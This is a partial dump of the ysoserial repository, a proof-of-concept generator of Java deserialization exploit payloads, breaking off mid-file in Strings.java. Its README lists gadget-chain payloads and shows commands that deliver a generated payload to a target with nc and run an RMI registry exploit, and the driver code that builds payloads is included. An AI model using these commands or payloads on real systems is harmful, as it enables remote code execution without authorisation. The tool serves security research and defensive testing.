Showing preview only (280K chars total). Download the full file or copy to clipboard to get everything.
Repository: frohoff/ysoserial
Branch: master
Commit: 218bcffcaaa9
Files: 91
Total size: 255.9 KB
Directory structure:
gitextract_xl98u19g/
├── .editorconfig
├── .github/
│ └── workflows/
│ └── publish.yml
├── .gitignore
├── .travis.yml
├── DISCLAIMER.txt
├── Dockerfile
├── LICENSE.txt
├── README.md
├── appveyor.yml
├── assembly.xml
├── pom.xml
└── src/
├── main/
│ └── java/
│ └── ysoserial/
│ ├── Deserializer.java
│ ├── GeneratePayload.java
│ ├── Serializer.java
│ ├── Strings.java
│ ├── exploit/
│ │ ├── JBoss.java
│ │ ├── JMXInvokeMBean.java
│ │ ├── JRMPClassLoadingListener.java
│ │ ├── JRMPClient.java
│ │ ├── JRMPListener.java
│ │ ├── JSF.java
│ │ ├── JenkinsCLI.java
│ │ ├── JenkinsListener.java
│ │ ├── JenkinsReverse.java
│ │ └── RMIRegistryExploit.java
│ ├── payloads/
│ │ ├── AspectJWeaver.java
│ │ ├── BeanShell1.java
│ │ ├── C3P0.java
│ │ ├── Click1.java
│ │ ├── Clojure.java
│ │ ├── CommonsBeanutils1.java
│ │ ├── CommonsCollections1.java
│ │ ├── CommonsCollections2.java
│ │ ├── CommonsCollections3.java
│ │ ├── CommonsCollections4.java
│ │ ├── CommonsCollections5.java
│ │ ├── CommonsCollections6.java
│ │ ├── CommonsCollections7.java
│ │ ├── DynamicDependencies.java
│ │ ├── FileUpload1.java
│ │ ├── Groovy1.java
│ │ ├── Hibernate1.java
│ │ ├── Hibernate2.java
│ │ ├── JBossInterceptors1.java
│ │ ├── JRMPClient.java
│ │ ├── JRMPListener.java
│ │ ├── JSON1.java
│ │ ├── JavassistWeld1.java
│ │ ├── Jdk7u21.java
│ │ ├── Jython1.java
│ │ ├── MozillaRhino1.java
│ │ ├── MozillaRhino2.java
│ │ ├── Myfaces1.java
│ │ ├── Myfaces2.java
│ │ ├── ObjectPayload.java
│ │ ├── ROME.java
│ │ ├── ReleaseableObjectPayload.java
│ │ ├── Spring1.java
│ │ ├── Spring2.java
│ │ ├── URLDNS.java
│ │ ├── Vaadin1.java
│ │ ├── Wicket1.java
│ │ ├── annotation/
│ │ │ ├── Authors.java
│ │ │ ├── Dependencies.java
│ │ │ └── PayloadTest.java
│ │ └── util/
│ │ ├── ClassFiles.java
│ │ ├── Gadgets.java
│ │ ├── JavaVersion.java
│ │ ├── PayloadRunner.java
│ │ └── Reflections.java
│ └── secmgr/
│ ├── DelegateSecurityManager.java
│ └── ExecCheckingSecurityManager.java
└── test/
└── java/
└── ysoserial/
├── CiTest.java
└── test/
├── CustomDeserializer.java
├── CustomPayloadArgs.java
├── CustomTest.java
├── WrappedTest.java
├── exploit/
│ └── RMIRegistryExploitTest.java
├── payloads/
│ ├── CommandExecTest.java
│ ├── FileUploadTest.java
│ ├── JRMPReverseConnectSMTest.java
│ ├── JRMPReverseConnectTest.java
│ ├── MyfacesTest.java
│ ├── PayloadsTest.java
│ ├── RemoteClassLoadingTest.java
│ └── TestHarnessTest.java
└── util/
├── Callables.java
├── Files.java
├── GadgetsTest.java
├── OS.java
└── Throwables.java
================================================
FILE CONTENTS
================================================
================================================
FILE: .editorconfig
================================================
root = true
[*]
end_of_line = lf
charset = utf-8
trim_trailing_whitespace = true
insert_final_newline = true
indent_style = space
indent_size = 4
max_line_length = 120
[*.{yml,yaml}]
indent_size = 2
================================================
FILE: .github/workflows/publish.yml
================================================
name: publish jar
on:
push:
tags:
- "v*.*.*"
permissions:
contents: write
jobs:
publish:
runs-on: ubuntu-latest
permissions:
contents: write
packages: write
steps:
- uses: actions/checkout@v3
- uses: actions/setup-java@v3
with:
java-version: '8'
distribution: 'adopt'
cache: 'maven'
- name: Set version
run: mvn versions:set -DnewVersion=${{ github.ref_name }}
- name: Build jar
run: mvn -B clean package -DskipTests
# - name: publish maven jar
# run: mvn -B deploy -DskipTests -DrepositoryId=github
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
- name: Rename artifact
run: mv target/ysoserial-${{ github.ref_name }}-all.jar target/ysoserial-all.jar
- name: Publish GitHub release
uses: softprops/action-gh-release@v1
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
with:
files: target/ysoserial-all.jar
================================================
FILE: .gitignore
================================================
# java
*.class
# mvn
target/
# eclipse
.classpath
.project
.settings/
# idea
.idea/
*.iml
# tests
pwntest
================================================
FILE: .travis.yml
================================================
dist: trusty
language: java
cache:
directories:
- $HOME/.m2
- $HOME/.mvn/
# jdk6 requires workarounds https://github.com/travis-ci/travis-ci/issues/9713
addons:
apt:
packages:
- openjdk-6-jdk
before_install:
- > # install mvn 3.2.5 for use with java6
which $HOME/.mvn/3.2.5/bin/mvn || mkdir -p $HOME/.mvn/3.2.5 &&
curl https://apache.osuosl.org/maven/maven-3/3.2.5/binaries/apache-maven-3.2.5-bin.tar.gz |
tar xz -C $HOME/.mvn/3.2.5 --strip-components=1
- if [ "$TRAVIS_JDK_VERSION" == "openjdk6" ]; then jdk_switcher use openjdk6; fi
- mvn -v
after_script:
- > # print more detailed info about test results
cat target/surefire-reports/TEST-ysoserial.test.payloads.PayloadsTest.xml |
grep testcase -A1 | grep -B1 -E 'failure|error|skipped' | grep -v -- --
matrix:
fast_finish: true
allow_failures:
- jdk: oraclejdk11
- jdk: openjdk6
- jdk: openjdk7
- jdk: openjdk9
- jdk: openjdk10
- jdk: openjdk11
include:
#- jdk: oraclejdk7 #https://github.com/travis-ci/travis-ci/issues/7884
- jdk: oraclejdk8
- jdk: oraclejdk11
- jdk: openjdk6
env: PATH=$HOME/.mvn/3.2.5/bin:$PATH
- jdk: openjdk7
- jdk: openjdk8
- jdk: openjdk9
- jdk: openjdk10
- jdk: openjdk11
================================================
FILE: DISCLAIMER.txt
================================================
DISCLAIMER
This software has been created purely for the purposes of academic research and
for the development of effective defensive techniques, and is not intended to be
used to attack systems except where explicitly authorized. Project maintainers
are not responsible or liable for misuse of the software. Use responsibly.
================================================
FILE: Dockerfile
================================================
FROM maven:3.5-jdk-8 as builder
WORKDIR /app
# download artifacts
COPY pom.xml .
COPY assembly.xml .
RUN mvn dependency:resolve
RUN mvn verify
RUN mvn compiler:help
# build
COPY src ./src
RUN mvn clean package -DskipTests
RUN mv target/ysoserial-*all*.jar target/ysoserial.jar
FROM eclipse-temurin:8-jdk-alpine
WORKDIR /app
COPY --from=builder /app/target/ysoserial.jar .
ENTRYPOINT ["java", "-jar", "ysoserial.jar"]
================================================
FILE: LICENSE.txt
================================================
Copyright (c) 2013 Chris Frohoff
MIT License
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
================================================
FILE: README.md
================================================
# ysoserial
[](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar)
[](https://travis-ci.com/github/frohoff/ysoserial)
[](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master)
[](https://jitpack.io/#frohoff/ysoserial)
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
## Description
Originally released as part of AppSecCali 2015 Talk
["Marshalling Pickles: how deserializing objects will ruin your day"](
https://frohoff.github.io/appseccali-marshalling-pickles/)
with gadget chains for Apache Commons Collections (3.x and 4.x), Spring Beans/Core (4.x), and Groovy (2.3.x).
Later updated to include additional gadget chains for
[JRE <= 1.7u21](https://gist.github.com/frohoff/24af7913611f8406eaf3) and several other libraries.
__ysoserial__ is a collection of utilities and property-oriented programming "gadget chains" discovered in common java
libraries that can, under the right conditions, exploit Java applications performing __unsafe deserialization__ of
objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then
serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes
this data, the chain will automatically be invoked and cause the command to be executed on the application host.
It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having
gadgets on the classpath.
## Disclaimer
This software has been created purely for the purposes of academic research and
for the development of effective defensive techniques, and is not intended to be
used to attack systems except where explicitly authorized. Project maintainers
are not responsible or liable for misuse of the software. Use responsibly.
## Usage
```shell
$ java -jar ysoserial.jar
Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'
Available payload types:
Payload Authors Dependencies
------- ------- ------------
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
Clojure @JackOfMostTrades clojure:1.8.0
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
CommonsCollections1 @frohoff commons-collections:3.1
CommonsCollections2 @frohoff commons-collections4:4.0
CommonsCollections3 @frohoff commons-collections:3.1
CommonsCollections4 @frohoff commons-collections4:4.0
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
CommonsCollections6 @matthias_kaiser commons-collections:3.1
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
Groovy1 @frohoff groovy:2.3.9
Hibernate1 @mbechler
Hibernate2 @mbechler
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
JRMPClient @mbechler
JRMPListener @mbechler
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Jdk7u21 @frohoff
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
MozillaRhino1 @matthias_kaiser js:1.7R2
MozillaRhino2 @_tint0 js:1.7R2
Myfaces1 @mbechler
Myfaces2 @mbechler
ROME @mbechler rome:1.0
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
URLDNS @gebl
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
```
## Examples
```shell
$ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride..........
0000570: 0078 7071 007e 003a .xpq.~.:
$ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
$ nc 10.10.10.10 1099 < groovypayload.bin
$ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
```
## Installation
[](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar)
Download the [latest release jar](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar) from GitHub releases.
## Building
Requires Java 1.7+ and Maven 3.x+
```mvn clean package -DskipTests```
## Code Status
[](https://travis-ci.com/github/frohoff/ysoserial)
[](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master)
## Contributing
1. Fork it
2. Create your feature branch (`git checkout -b my-new-feature`)
3. Commit your changes (`git commit -am 'Add some feature'`)
4. Push to the branch (`git push origin my-new-feature`)
5. Create new Pull Request
## See Also
* [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet): info on vulnerabilities, tools, blogs/write-ups, etc.
* [marshalsec](https://github.com/frohoff/marshalsec): similar project for various Java deserialization formats/libraries
* [ysoserial.net](https://github.com/pwntester/ysoserial.net): similar project for .NET deserialization
================================================
FILE: appveyor.yml
================================================
# based on https://github.com/GoogleCloudPlatform/google-cloud-java/blob/master/appveyor.yml
# build version
version: '{build}'
# Do not build on tags
skip_tags: true
# enviroment settings
environment:
matrix:
- JAVA_HOME: C:\Program Files\Java\jdk1.6.0
M2_HOME: C:\bin\apache-maven-3.2.5
- JAVA_HOME: C:\Program Files\Java\jdk1.7.0
MAVEN_OPTS: -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2
- JAVA_HOME: C:\Program Files\Java\jdk1.8.0
matrix:
allow_failures:
- JAVA_HOME: C:\Program Files\Java\jdk1.6.0
- JAVA_HOME: C:\Program Files\Java\jdk1.7.0
# install required tools (maven, secure-file, encrypted files)
install:
- cmd: if not exist "C:\bin\apache-maven-3.2.5\bin\*.*" cinst maven --version 3.2.5 --allow-empty-checksums
- cmd: echo %JAVA_HOME%
- cmd: echo %M2_HOME%
# build and install artifacts
build_script:
- '"%M2_HOME%\bin\mvn" clean install -DskipTests'
# verify artifacts
test_script:
- '"%M2_HOME%\bin\mvn" test'
# preserve dependencies between builds
cache:
- C:\Users\appveyor\.m2
- C:\bin\apache-maven-3.2.5
================================================
FILE: assembly.xml
================================================
<assembly
xmlns="http://maven.apache.org/plugins/maven-assembly-plugin/assembly/1.1.3"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/plugins/maven-assembly-plugin/assembly/1.1.3 http://maven.apache.org/xsd/assembly-1.1.3.xsd">
<id>fat-tests</id>
<formats>
<format>jar</format>
</formats>
<includeBaseDirectory>false</includeBaseDirectory>
<dependencySets>
<dependencySet>
<outputDirectory>/</outputDirectory>
<useProjectArtifact>true</useProjectArtifact>
<unpack>true</unpack>
<scope>test</scope>
</dependencySet>
</dependencySets>
<fileSets>
<fileSet>
<directory>${project.build.directory}/test-classes</directory>
<outputDirectory>/</outputDirectory>
<includes>
<include>**/*.class</include>
</includes>
<useDefaultExcludes>true</useDefaultExcludes>
</fileSet>
</fileSets>
</assembly>
================================================
FILE: pom.xml
================================================
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>ysoserial</groupId>
<artifactId>ysoserial</artifactId>
<version>0.0.6-SNAPSHOT</version>
<packaging>jar</packaging>
<name>ysoserial</name>
<url>https://github.com/frohoff/ysoserial/</url>
<properties>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
</properties>
<build>
<plugins>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-compiler-plugin</artifactId>
<version>3.5.1</version>
<configuration>
<!-- maximize compatibility -->
<source>1.6</source>
<target>1.6</target>
<!-- ignore noisy internal api warnings -->
<compilerArgument>-XDignore.symbol.file</compilerArgument>
<fork>true</fork>
</configuration>
</plugin>
<plugin>
<artifactId>maven-assembly-plugin</artifactId>
<configuration>
<finalName>${project.artifactId}-${project.version}-all</finalName>
<appendAssemblyId>false</appendAssemblyId>
<archive>
<manifest>
<mainClass>ysoserial.GeneratePayload</mainClass>
</manifest>
</archive>
<descriptors>
<descriptor>assembly.xml</descriptor>
</descriptors>
</configuration>
<executions>
<execution>
<id>make-assembly</id>
<phase>package</phase>
<goals>
<goal>single</goal>
</goals>
</execution>
</executions>
</plugin>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-surefire-plugin</artifactId>
<version>3.0.0-M1</version>
<configuration>
<trimStackTrace>false</trimStackTrace>
<systemPropertyVariables>
<java.rmi.server.useCodebaseOnly>false</java.rmi.server.useCodebaseOnly>
</systemPropertyVariables>
</configuration>
</plugin>
</plugins>
</build>
<repositories>
<repository>
<id>central</id>
<layout>default</layout>
<url>https://repo.maven.apache.org/maven2/</url>
</repository>
<repository>
<id>ysoserial-m2-repo</id>
<layout>default</layout>
<url>https://raw.githubusercontent.com/frohoff/ysoserial-m2-repo/master</url>
</repository>
<repository>
<id>jenkins</id>
<layout>default</layout>
<url>https://repo.jenkins-ci.org/public/</url>
</repository>
</repositories>
<dependencies>
<!-- testing depedencies -->
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
<version>4.12</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.mockito</groupId>
<artifactId>mockito-core</artifactId>
<version>1.10.19</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.github.stefanbirkner</groupId>
<artifactId>system-rules</artifactId>
<version>1.8.0</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.nanohttpd</groupId>
<artifactId>nanohttpd</artifactId>
<version>2.2.0</version>
<scope>test</scope>
</dependency>
<!-- non-gadget dependencies -->
<dependency>
<groupId>org.reflections</groupId>
<artifactId>reflections</artifactId>
<version>0.9.9</version>
</dependency>
<dependency>
<groupId>org.jboss.shrinkwrap.resolver</groupId>
<artifactId>shrinkwrap-resolver-depchain</artifactId>
<version>2.2.6</version>
<type>pom</type>
</dependency>
<dependency>
<groupId>org.javassist</groupId>
<artifactId>javassist</artifactId>
<version>3.19.0-GA</version>
</dependency>
<dependency>
<groupId>com.nqzero</groupId>
<artifactId>permit-reflect</artifactId>
<version>0.3</version>
</dependency>
<dependency>
<groupId>commons-codec</groupId>
<artifactId>commons-codec</artifactId>
<version>1.9</version>
</dependency>
<dependency>
<groupId>commons-io</groupId>
<artifactId>commons-io</artifactId>
<version>2.6</version>
</dependency>
<dependency>
<artifactId>remoting</artifactId>
<groupId>org.jenkins-ci.main</groupId>
<version>2.55</version>
</dependency>
<dependency>
<groupId>org.jboss.logging</groupId>
<artifactId>jboss-logging</artifactId>
<version>3.3.0.Final</version>
</dependency>
<dependency>
<groupId>org.jboss.remoting</groupId>
<artifactId>jboss-remoting</artifactId>
<version>4.0.19.Final</version>
</dependency>
<dependency>
<groupId>org.jboss</groupId>
<artifactId>jboss-common-core</artifactId>
<version>2.5.0.Final</version>
<exclusions>
<exclusion>
<groupId>org.jboss.logging</groupId>
<artifactId>jboss-logging-spi</artifactId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>org.jboss.xnio</groupId>
<artifactId>xnio-nio</artifactId>
<version>3.3.4.Final</version>
</dependency>
<dependency>
<groupId>org.jboss.sasl</groupId>
<artifactId>jboss-sasl</artifactId>
<version>1.0.5.Final</version>
</dependency>
<dependency>
<groupId>org.jboss.remotingjmx</groupId>
<artifactId>remoting-jmx</artifactId>
<version>2.0.1.Final</version>
</dependency>
<!-- gadget dependecies -->
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.1</version>
</dependency>
<dependency>
<groupId>org.beanshell</groupId>
<artifactId>bsh</artifactId>
<version>2.0b5</version>
</dependency>
<dependency>
<groupId>commons-beanutils</groupId>
<artifactId>commons-beanutils</artifactId>
<version>1.9.2</version>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-collections4</artifactId>
<version>4.0</version>
</dependency>
<dependency>
<groupId>org.codehaus.groovy</groupId>
<artifactId>groovy</artifactId>
<version>2.3.9</version>
</dependency>
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-core</artifactId>
<version>4.1.4.RELEASE</version>
</dependency>
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-beans</artifactId>
<version>4.1.4.RELEASE</version>
</dependency>
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-core</artifactId>
<version>4.3.11.Final</version>
</dependency>
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-aop</artifactId>
<version>4.1.4.RELEASE</version>
</dependency>
<dependency>
<groupId>net.sf.json-lib</groupId>
<artifactId>json-lib</artifactId>
<classifier>jdk15</classifier>
<version>2.4</version>
</dependency>
<dependency>
<groupId>commons-fileupload</groupId>
<artifactId>commons-fileupload</artifactId>
<version>1.3</version>
</dependency>
<dependency>
<groupId>org.apache.wicket</groupId>
<artifactId>wicket-util</artifactId>
<version>6.23.0</version>
</dependency>
<dependency>
<groupId>com.mchange</groupId>
<artifactId>c3p0</artifactId>
<version>0.9.5.2</version>
</dependency>
<dependency>
<groupId>javax.servlet</groupId>
<artifactId>javax.servlet-api</artifactId>
<version>3.1.0</version>
</dependency>
<dependency>
<groupId>org.apache.myfaces.core</groupId>
<artifactId>myfaces-impl</artifactId>
<version>2.2.9</version>
</dependency>
<dependency>
<groupId>xalan</groupId>
<artifactId>xalan</artifactId>
<version>2.7.2</version>
</dependency>
<dependency>
<groupId>rome</groupId>
<artifactId>rome</artifactId>
<version>1.0</version>
</dependency>
<dependency>
<groupId>org.python</groupId>
<artifactId>jython-standalone</artifactId>
<version>2.5.2</version>
</dependency>
<dependency>
<groupId>rhino</groupId>
<artifactId>js</artifactId>
<version>1.7R2</version>
</dependency>
<dependency>
<groupId>javassist</groupId>
<artifactId>javassist</artifactId>
<version>3.12.0.GA</version>
</dependency>
<dependency>
<groupId>org.jboss.weld</groupId>
<artifactId>weld-core</artifactId>
<version>1.1.33.Final</version>
</dependency>
<dependency>
<groupId>org.jboss.interceptor</groupId>
<artifactId>jboss-interceptor-core</artifactId>
<version>2.0.0.Final</version>
</dependency>
<dependency>
<groupId>org.jboss.interceptor</groupId>
<artifactId>jboss-interceptor-spi</artifactId>
<version>2.0.0.Final</version>
</dependency>
<dependency>
<groupId>javax.enterprise</groupId>
<artifactId>cdi-api</artifactId>
<version>1.0-SP1</version>
</dependency>
<dependency>
<groupId>javax.interceptor</groupId>
<artifactId>javax.interceptor-api</artifactId>
<version>3.1</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-api</artifactId>
<version>1.7.21</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-jdk14</artifactId>
<version>1.7.21</version>
</dependency>
<dependency>
<groupId>org.clojure</groupId>
<artifactId>clojure</artifactId>
<version>1.8.0</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-server</artifactId>
<version>7.7.14</version>
</dependency>
<dependency>
<groupId>org.aspectj</groupId>
<artifactId>aspectjweaver</artifactId>
<version>1.9.5</version>
</dependency>
<dependency>
<groupId>org.apache.click</groupId>
<artifactId>click-nodeps</artifactId>
<version>2.3.0</version>
</dependency>
</dependencies>
<profiles>
<profile>
<id>jdk6</id>
<activation>
<jdk>1.6</jdk>
</activation>
<build>
<plugins>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-surefire-plugin</artifactId>
<version>2.22.1</version>
</plugin>
</plugins>
</build>
<dependencies>
<dependency>
<groupId>javax.el</groupId>
<artifactId>javax.el-api</artifactId>
<version>3.0.0</version>
</dependency>
</dependencies>
<!-- workaround for non-overlapping TLS versions in JDK6 and central repo
https://central.sonatype.org/articles/2018/May/04/discontinued-support-for-tlsv11-and-below/ -->
<repositories>
<repository>
<id>repo1</id>
<url>http://repo1.maven.org/maven2</url><!-- intentionally http (see above) -->
</repository>
</repositories>
<pluginRepositories>
<pluginRepository>
<id>repo1</id>
<url>http://repo1.maven.org/maven2</url><!-- intentionally http (see above) -->
</pluginRepository>
</pluginRepositories>
</profile>
<profile>
<id>hibernate5</id>
<activation>
<property>
<name>hibernate5</name>
</property>
</activation>
<dependencies>
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-core</artifactId>
<version>5.0.7.Final</version>
</dependency>
<dependency>
<groupId>javax.el</groupId>
<artifactId>javax.el-api</artifactId>
<version>3.0.0</version>
</dependency>
</dependencies>
</profile>
<profile>
<id>apache-el</id>
<activation>
<activeByDefault>true</activeByDefault>
<property>
<name>el</name>
<value>apache</value>
</property>
</activation>
<dependencies>
<dependency>
<groupId>org.mortbay.jasper</groupId>
<artifactId>apache-el</artifactId>
<version>8.0.27</version>
</dependency>
</dependencies>
</profile>
<profile>
<id>juel</id>
<activation>
<property>
<name>el</name>
<value>juel</value>
</property>
</activation>
<dependencies>
<dependency>
<groupId>de.odysseus.juel</groupId>
<artifactId>juel-impl</artifactId>
<version>2.2.7</version>
</dependency>
<dependency>
<groupId>de.odysseus.juel</groupId>
<artifactId>juel-api</artifactId>
<version>2.2.7</version>
</dependency>
</dependencies>
</profile>
</profiles>
<distributionManagement>
<repository>
<id>github</id>
<name>GitHub Packages</name>
<url>https://maven.pkg.github.com/frohoff/ysoserial</url>
</repository>
</distributionManagement>
</project>
================================================
FILE: src/main/java/ysoserial/Deserializer.java
================================================
package ysoserial;
import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.util.concurrent.Callable;
public class Deserializer implements Callable<Object> {
private final byte[] bytes;
public Deserializer(byte[] bytes) { this.bytes = bytes; }
public Object call() throws Exception {
return deserialize(bytes);
}
public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
return deserialize(in);
}
public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
final ObjectInputStream objIn = new ObjectInputStream(in);
return objIn.readObject();
}
public static void main(String[] args) throws ClassNotFoundException, IOException {
final InputStream in = args.length == 0 ? System.in : new FileInputStream(new File(args[0]));
Object object = deserialize(in);
}
}
================================================
FILE: src/main/java/ysoserial/GeneratePayload.java
================================================
package ysoserial;
import java.io.PrintStream;
import java.util.*;
import ysoserial.payloads.ObjectPayload;
import ysoserial.payloads.ObjectPayload.Utils;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
@SuppressWarnings("rawtypes")
public class GeneratePayload {
private static final int INTERNAL_ERROR_CODE = 70;
private static final int USAGE_CODE = 64;
public static void main(final String[] args) {
if (args.length != 2) {
printUsage();
System.exit(USAGE_CODE);
}
final String payloadType = args[0];
final String command = args[1];
final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
if (payloadClass == null) {
System.err.println("Invalid payload type '" + payloadType + "'");
printUsage();
System.exit(USAGE_CODE);
return; // make null analysis happy
}
try {
final ObjectPayload payload = payloadClass.newInstance();
final Object object = payload.getObject(command);
PrintStream out = System.out;
Serializer.serialize(object, out);
ObjectPayload.Utils.releasePayload(payload, object);
} catch (Throwable e) {
System.err.println("Error while generating or serializing payload");
e.printStackTrace();
System.exit(INTERNAL_ERROR_CODE);
}
System.exit(0);
}
private static void printUsage() {
System.err.println("Y SO SERIAL?");
System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'");
System.err.println(" Available payload types:");
final List<Class<? extends ObjectPayload>> payloadClasses =
new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
Collections.sort(payloadClasses, new Strings.ToStringComparator()); // alphabetize
final List<String[]> rows = new LinkedList<String[]>();
rows.add(new String[] {"Payload", "Authors", "Dependencies"});
rows.add(new String[] {"-------", "-------", "------------"});
for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
rows.add(new String[] {
payloadClass.getSimpleName(),
Strings.join(Arrays.asList(Authors.Utils.getAuthors(payloadClass)), ", ", "@", ""),
Strings.join(Arrays.asList(Dependencies.Utils.getDependenciesSimple(payloadClass)),", ", "", "")
});
}
final List<String> lines = Strings.formatTable(rows);
for (String line : lines) {
System.err.println(" " + line);
}
}
}
================================================
FILE: src/main/java/ysoserial/Serializer.java
================================================
package ysoserial;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.util.concurrent.Callable;
public class Serializer implements Callable<byte[]> {
private final Object object;
public Serializer(Object object) {
this.object = object;
}
public byte[] call() throws Exception {
return serialize(object);
}
public static byte[] serialize(final Object obj) throws IOException {
final ByteArrayOutputStream out = new ByteArrayOutputStream();
serialize(obj, out);
return out.toByteArray();
}
public static void serialize(final Object obj, final OutputStream out) throws IOException {
final ObjectOutputStream objOut = new ObjectOutputStream(out);
objOut.writeObject(obj);
}
}
================================================
FILE: src/main/java/ysoserial/Strings.java
================================================
package ysoserial;
import org.apache.commons.lang.StringUtils;
import java.util.Arrays;
import java.util.Comparator;
import java.util.LinkedList;
import java.util.List;
public class Strings {
public static String join(Iterable<String> strings, String sep, String prefix, String suffix) {
final StringBuilder sb = new StringBuilder();
boolean first = true;
for (String s : strings) {
if (! first) sb.append(sep);
if (prefix != null) sb.append(prefix);
sb.append(s);
